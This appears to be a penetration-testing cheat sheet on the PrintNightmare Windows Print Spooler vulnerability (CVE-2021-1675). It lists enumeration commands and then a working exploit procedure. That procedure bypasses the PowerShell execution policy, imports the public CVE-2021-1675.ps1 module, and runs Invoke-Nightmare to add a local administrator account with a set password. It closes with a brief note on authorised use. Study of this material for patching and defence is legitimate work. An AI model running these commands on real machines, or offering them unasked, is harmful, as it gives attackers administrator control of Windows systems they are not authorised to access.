- This PoC creates a DLL payload remotely or locally using a custom version of Impacket.
- This PowerShell implementation is good for an easy local privesc.
PrintNightmare refers to vulnerabilities in the Windows Print Spooler service that can allow code execution with elevated privileges under vulnerable configurations.
The Print Spooler runs with high privileges and is commonly present on Windows systems. When vulnerable, it can be abused locally or remotely depending on the target configuration and exploit path.
Enumeration
Check whether the Print Spooler service is running:
Get-Service Spooler
or:
sc query Spooler
Check for the spooler named pipe:
ls \\localhost\pipe\spoolss
If the pipe does not exist, the service is likely not running.
Check Point and Print policy configuration:
reg query "HKLM\Software\Policies\Microsoft\Windows NT\Printers\PointAndPrint"
Interesting findings include:
- Print Spooler running
spoolsspipe accessible- Vulnerable Windows build
- Missing PrintNightmare patches
- Weak Point and Print restrictions
- Local privilege escalation path available
Exploit
- Confirm the Print Spooler service is running
- Confirm the target build is vulnerable
- Confirm the exploit path is local or remote
- Import the exploit module
- Execute the exploit
- Verify the resulting privilege change
Bypass PowerShell execution policy for the current process:
Set-ExecutionPolicy Bypass -Scope Process
Import the module:
Import-Module .\CVE-2021-1675.ps1
Add a local administrator user:
Invoke-Nightmare -NewUser "ootw" -NewPassword "Pwnd1234!" -DriverName "PrintIt"
Confirm the user was created:
net user ootw
Confirm local administrator membership:
net localgroup administrators
Adding a local administrator user is noisy. In real assessments, this should only be done when explicitly allowed.